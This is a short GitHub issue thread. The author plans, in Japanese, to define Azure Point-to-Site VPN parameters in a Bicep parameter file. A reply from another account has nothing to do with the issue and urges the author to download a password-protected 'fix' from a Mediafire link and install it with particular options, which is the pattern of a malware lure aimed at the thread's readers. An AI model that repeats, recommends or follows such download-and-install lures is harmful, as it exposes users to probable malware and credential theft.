### ISSUE TITLE
Azure VPNのP2S 用パラメータ定義

### ISSUE THREAD

**Issue by masatoshisato** [masatoshisato/RagSystem#1]
Azure Portal でVPNリソースを作ってみて必要なパラメータの理解とP2S向けのパラメータをmain.bicepparamに定義する。

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
